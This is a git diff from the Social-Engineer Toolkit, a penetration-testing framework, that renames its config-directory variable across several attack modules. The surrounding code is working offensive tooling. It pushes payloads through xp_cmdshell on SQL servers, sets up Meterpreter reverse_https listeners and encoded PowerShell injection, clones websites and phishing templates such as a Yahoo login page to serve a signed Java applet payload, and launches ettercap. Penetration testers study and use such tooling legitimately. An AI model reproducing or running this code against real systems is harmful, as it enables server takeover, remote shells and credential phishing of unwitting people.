(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe") payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen: with open(payload_filename, "rb") as fileopen:
@ -202,12 +202,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
data = binascii.hexlify(data) data = binascii.hexlify(data)
# we write out binary out to a file # we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "payload.hex"), "w") as filewrite:
filewrite.write(data) filewrite.write(data)
if choice1 == "1": if choice1 == "1":
# if we are using metasploit, start the listener # if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if not os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
if operating_system == "posix": if operating_system == "posix":
try: try:
core.module_reload(pexpect) core.module_reload(pexpect)
@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path() msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config"))) os.path.join(core.userconfigpath, "meta_config")))
# random executable name # random executable name
random_exe = core.generate_random_string(10, 15) random_exe = core.generate_random_string(10, 15)
@ -240,9 +240,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
#with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite = file(core.setdir + "/payload_options.shellcode", "w") filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close() filewrite.close()
@ -253,21 +253,21 @@ def deploy_hex2binary(ipaddr, port, username, password):
# launch powershell # launch powershell
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.userconfigpath, "reports/powershell"))
x86 = file(core.setdir + "x86.powershell").read().rstrip() x86 = file(core.userconfigpath + "x86.powershell").read().rstrip()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc # if our payload is x86 based - need to prep msfconsole rc
if payload == "x86": if payload == "x86":
powershell_command = x86 powershell_command = x86
filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w") filewrite = open(core.userconfigpath + "reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n" "set lport {0}\n"
@ -289,7 +289,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc"))) os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...") core.print_status("Be patient, Metasploit takes a little bit to start...")
#child2.expect("Starting the payload handler", timeout=30000) #child2.expect("Starting the payload handler", timeout=30000)
@ -309,8 +309,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
# here we start the conversion and execute the payload # here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.") core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time # read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: #with open(os.path.join(core.userconfigpath, 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r") fileopen = open(core.userconfigpath + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...") core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen: while fileopen:
@ -335,10 +335,10 @@ def deploy_hex2binary(ipaddr, port, username, password):
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload # if we are using SET payload
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
core.print_status("Spawning separate child process for listener...") core.print_status("Spawning separate child process for listener...")
try: try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) shutil.copyfile(os.path.join(core.userconfigpath, "web_clone/x"), definepath)
except: except:
pass pass
@ -376,8 +376,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2": if option == "2":
core.print_status("Triggering payload stager...") core.print_status("Triggering payload stager...")
alphainject = "" alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): if os.path.isfile(os.path.join(core.userconfigpath, "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: with open(os.path.join(core.userconfigpath, "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read() alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
@ -387,7 +387,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if pexpect doesnt exit right then it freaks out # if pexpect doesnt exit right then it freaks out
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py") os.system("python ../../payloads/set_payloads/listener.py")
try: try:
# interact with the child process through pexpect # interact with the child process through pexpect

16
src/fasttrack/psexec.py
View file

@ -68,7 +68,7 @@ try:
if port == "": if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port)) filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
@ -80,20 +80,20 @@ try:
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.userconfigpath, "reports/powershell"))
x86 = open(core.setdir + "x86.powershell", "r").read() x86 = open(core.userconfigpath + "x86.powershell", "r").read()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
payload = "windows/meterpreter/reverse_https\n" # if we are using x86 payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack # write out our answer file for the powershell injection attack
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n" "set LPORT {0}\n"
@ -113,7 +113,7 @@ try:
# launch metasploit below # launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.") core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
# handle exceptions # handle exceptions

2
src/fasttrack/sccm/sccm_main.py
View file

@ -48,7 +48,7 @@ Next
'''.format(sms_server, package_id) '''.format(sms_server, package_id)
# write out the file to reports # write out the file to reports
with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration) filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.") core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.") core.print_status("You need to copy the script to the startup folder of the server.")

2
src/html/fasttrack_http_server.py
View file

@ -7,4 +7,4 @@ definepath = os.getcwd()
sys.path.append(definepath) sys.path.append(definepath)
import src.core.setcore as core import src.core.setcore as core
core.start_web_server_unthreaded(os.path.join(core.setdir, "web_clone")) core.start_web_server_unthreaded(os.path.join(core.userconfigpath, "web_clone"))

114
src/html/spawn.py
View file

@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="):
custom = 1 custom = 1
if not "CMD/MULTI" in check_options("CUSTOM_EXE="): if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
# here we need to modify the java applet to recognize custom attribute # here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# we randomize param name so static sigs cant be used # we randomize param name so static sigs cant be used
@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="):
'param name="8" value="%s"' % (goat_random)) 'param name="8" value="%s"' % (goat_random))
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
@ -68,8 +68,8 @@ msf_path = ""
# see if we are using setshell # see if we are using setshell
set_payload = "" set_payload = ""
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
set_payload = line.rstrip() set_payload = line.rstrip()
@ -97,8 +97,8 @@ def web_server_start():
web_port = check_config("WEB_PORT=") web_port = check_config("WEB_PORT=")
# see if exploit requires webdav # see if exploit requires webdav
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -114,8 +114,8 @@ def web_server_start():
ipaddr = input("Enter your ipaddress: ") ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined # Grab custom or set defined
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -124,13 +124,13 @@ def web_server_start():
template = line[1] template = line[1]
# grab web attack selection # grab web attack selection
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r").readlines() fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
# if it doesn't exist just set a default template # if it doesn't exist just set a default template
if not os.path.isfile(setdir + "/attack_vector"): if not os.path.isfile(userconfigpath + "attack_vector"):
attack_vector = "nada" attack_vector = "nada"
# Sticking it to A/V below # Sticking it to A/V below
@ -145,14 +145,14 @@ def web_server_start():
# check multiattack flags here # check multiattack flags here
multiattack_harv = "off" multiattack_harv = "off"
if os.path.isfile(setdir + "/multi_harvester"): if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack_harv = "on" multiattack_harv = "on"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack_harv = "on" multiattack_harv = "on"
# open our config file that was specified in SET # open our config file that was specified in SET
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here # start loop here
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
@ -164,7 +164,7 @@ def web_server_start():
url = line[1].rstrip() url = line[1].rstrip()
# if we didn't create template then do self # if we didn't create template then do self
if not os.path.isfile(setdir + "/site.template"): if not os.path.isfile(userconfigpath + "site.template"):
template = "SELF" template = "SELF"
# If SET is setting up the website for you, get the website ready for # If SET is setting up the website for you, get the website ready for
@ -224,38 +224,38 @@ def web_server_start():
if attack_vector != 'hijacking': if attack_vector != 'hijacking':
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC) print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed # copy all the files needed
if not os.path.isfile(setdir + "/" + applet_name): if not os.path.isfile(userconfigpath + "" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (setdir, applet_name)) (definepath), "%s/%s" % (userconfigpath, applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name), shutil.copyfile(userconfigpath + "%s" % (applet_name),
"%s/web_clone/%s" % (setdir, applet_name)) "%s/web_clone/%s" % (userconfigpath, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)): if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=") nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" % shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (setdir, nix)) (definepath), "%s/web_clone/%s" % (userconfigpath, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)): if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=") mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (setdir, definepath, mac)) "%s/web_clone/%s" % (userconfigpath, definepath, mac))
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
win = check_options("MSF.EXE=") win = check_options("MSF.EXE=")
shutil.copyfile(setdir + "/msf.exe", shutil.copyfile(userconfigpath + "msf.exe",
"%s/web_clone/%s" % (setdir, win)) "%s/web_clone/%s" % (userconfigpath, win))
# pull random name generation # pull random name generation
print_status( print_status(
"The site has been moved. SET Web Server is now listening..") "The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=") rand_gen = check_options("MSF_EXE=")
if rand_gen != 0: if rand_gen != 0:
if os.path.isfile(setdir + "/custom.exe"): if os.path.isfile(userconfigpath + "custom.exe"):
shutil.copyfile(setdir + "/msf.exe", shutil.copyfile(userconfigpath + "msf.exe",
setdir + "/web_clone/msf.exe") userconfigpath + "web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now") print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(setdir + "/web_clone/msf.exe", shutil.copyfile(userconfigpath + "web_clone/msf.exe",
setdir + "/web_clone/%s" % (rand_gen)) userconfigpath + "web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right # if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(setdir + "/docbase.file"): if os.path.isfile(userconfigpath + "docbase.file"):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd"> "http://www.w3.org/TR/html4/frameset.dtd">
<HTML> <HTML>
@ -267,11 +267,11 @@ def web_server_start():
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET> </FRAMESET>
</HTML>""" % (ipaddr)) </HTML>""" % (ipaddr))
if os.path.isfile(setdir + "/web_clone/site.html"): if os.path.isfile(userconfigpath + "web_clone/site.html"):
os.remove(setdir + "/web_clone/site.html") os.remove(userconfigpath + "web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
setdir + "/web_clone/site.html") userconfigpath + "web_clone/site.html")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(docbase) filewrite.write(docbase)
filewrite.close() filewrite.close()
@ -288,7 +288,7 @@ def web_server_start():
import src.core.webserver as webserver import src.core.webserver as webserver
# specify the path for the SET web directories for the applet # specify the path for the SET web directories for the applet
# attack # attack
path = (setdir + "/web_clone/") path = (userconfigpath + "web_clone/")
try: try:
import multiprocessing import multiprocessing
p = multiprocessing.Process( p = multiprocessing.Process(
@ -320,7 +320,7 @@ def web_server_start():
import src.core.webserver as webserver import src.core.webserver as webserver
# specify the path for the SET web directories for the # specify the path for the SET web directories for the
# applet attack # applet attack
path = (setdir + "/web_clone/") path = (userconfigpath + "web_clone/")
p = multiprocessing.Process( p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path)) target=webserver.start_server, args=(web_port, path))
p.start() p.start()
@ -350,7 +350,7 @@ def web_server_start():
if apache == 1: if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait() (definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
# if we are tracking users # if we are tracking users
if track_email == "on": if track_email == "on":
now = datetime.datetime.today() now = datetime.datetime.today()
@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=")
# setup multi attack options here # setup multi attack options here
multiattack = "off" multiattack = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack = "on" multiattack = "on"
if os.path.isfile(setdir + "/multi_harvester"): if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack = "on" multiattack = "on"
# Grab custom or set defined # Grab custom or set defined
template = "" template = ""
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -532,8 +532,8 @@ try:
print(( print((
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)) bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -550,8 +550,8 @@ try:
web_server_start() web_server_start()
# if we are using ettercap # if we are using ettercap
if os.path.isfile(setdir + "/ettercap"): if os.path.isfile(userconfigpath + "ettercap"):
fileopen5 = open(setdir + "/ettercap", "r") fileopen5 = open(userconfigpath + "ettercap", "r")
for line in fileopen5: for line in fileopen5:
ettercap = line.rstrip() ettercap = line.rstrip()
# run in background # run in background
@ -561,7 +561,7 @@ try:
stderr=subprocess.PIPE, stdout=subprocess.PIPE) stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory # if metasploit config is in directory
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
print_info("Launching MSF Listener...") print_info("Launching MSF Listener...")
print_info("This may take a few to load MSF...") print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener # this checks to see if we want to start a listener
@ -573,12 +573,12 @@ try:
import pexpect import pexpect
# specify if we are using the multi pyinjector # specify if we are using the multi pyinjector
meta_config = "meta_config" meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"): if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector" meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload # if we arent using a custom payload
if custom != 1: if custom != 1:
child1 = pexpect.spawn( child1 = pexpect.spawn(
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config)) "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
# check if we want to deliver emails or track users that click the # check if we want to deliver emails or track users that click the
# link # link
webattack_email = check_config("WEBATTACK_EMAIL=").lower() webattack_email = check_config("WEBATTACK_EMAIL=").lower()
@ -592,11 +592,11 @@ try:
if custom != 1: if custom != 1:
child1.interact() child1.interact()
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
port = check_options("PORT=") port = check_options("PORT=")
# grab configuration # grab configuration
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
set_payload = line.rstrip() set_payload = line.rstrip()
@ -627,12 +627,12 @@ try:
# if not then run it in windows # if not then run it in windows
if operating_system == "windows": if operating_system == "windows":
if not os.path.isfile(setdir + "/ratteserver.exe"): if not os.path.isfile(userconfigpath + "ratteserver.exe"):
shutil.copyfile( shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe") "../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
shutil.copyfile( shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll") "../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath, port)) os.system(userconfigpath + "ratteserver %s" % (definepath, port))
# handle errors # handle errors
except Exception as e: except Exception as e:

12
src/html/templates/template.py
View file

@ -73,13 +73,13 @@ if choice == "5":
shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template") shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template")
url = "http://mail.yahoo.com" url = "http://mail.yahoo.com"
if not os.path.isdir(os.path.join(core.setdir, "web_clone")): if not os.path.isdir(os.path.join(core.userconfigpath, "web_clone")):
os.makedirs(os.path.join(core.setdir, "web_clone/")) os.makedirs(os.path.join(core.userconfigpath, "web_clone/"))
if os.path.isfile(os.path.join(core.setdir, "web_clone/index.html")): if os.path.isfile(os.path.join(core.userconfigpath, "web_clone/index.html")):
os.remove(os.path.join(core.setdir, "web_clone/index.html")) os.remove(os.path.join(core.userconfigpath, "web_clone/index.html"))
shutil.copyfile("src/html/index.template", os.path.join(core.setdir, "web_clone/index.html")) shutil.copyfile("src/html/index.template", os.path.join(core.userconfigpath, "web_clone/index.html"))
with open(os.path.join(core.setdir, "site.template"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "site.template"), 'w') as filewrite:
filewrite.write("TEMPLATE=SELF\nURL={0}".format(url)) filewrite.write("TEMPLATE=SELF\nURL={0}".format(url))
core.debug_msg(core.mod_name(), "exiting src.html.templates.template'", 1) core.debug_msg(core.mod_name(), "exiting src.html.templates.template'", 1)

2
src/html/unsigned/self_sign.py
View file

@ -49,7 +49,7 @@ subprocess.Popen("jarsigner -keystore mykeystore "
# move it into our html directory # move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait() subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar {0}".format(core.setdir), shell=True) subprocess.Popen("mv Signed_Update.jar {0}".format(core.userconfigpath), shell=True)
# move back to original directory # move back to original directory
os.chdir("../../../") os.chdir("../../../")

6
src/html/unsigned/verified_sign.py
View file

@ -82,8 +82,8 @@ if firstprompt == "1":
# import into SET # import into SET
core.print_status("Importing the applet into SET for weaponization...") core.print_status("Importing the applet into SET for weaponization...")
shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar.orig")) shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar.orig"))
shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar")) shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar"))
core.print_status("The applet has been successfully imported into SET.") core.print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate # if we want to either generate a certificate or use our own certificate
@ -185,6 +185,6 @@ if firstprompt == "2":
# sign the applet with the imported certificate # sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait() subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait()
# move it into our html directory # move it into our html directory
subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.setdir, "Signed_Update.jar.orig")), shell=True).wait() subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.userconfigpath, "Signed_Update.jar.orig")), shell=True).wait()
# move back to original directory # move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...") core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")

30
src/payloads/powershell/prep.py
View file

@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=")
pyinjection = check_options("PYINJECTION=") pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON": if pyinjection == "ON":
# check to ensure that the payload options were specified right # check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"): if os.path.isfile(userconfigpath + "payload_options.shellcode"):
pyinjection = "on" pyinjection = "on"
print_status( print_status(
"Multi/Pyinjection was specified. Overriding config options.") "Multi/Pyinjection was specified. Overriding config options.")
@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False:
# prompt what port to listen on for powershell then make an append to the current # prompt what port to listen on for powershell then make an append to the current
# metasploit answer file # metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
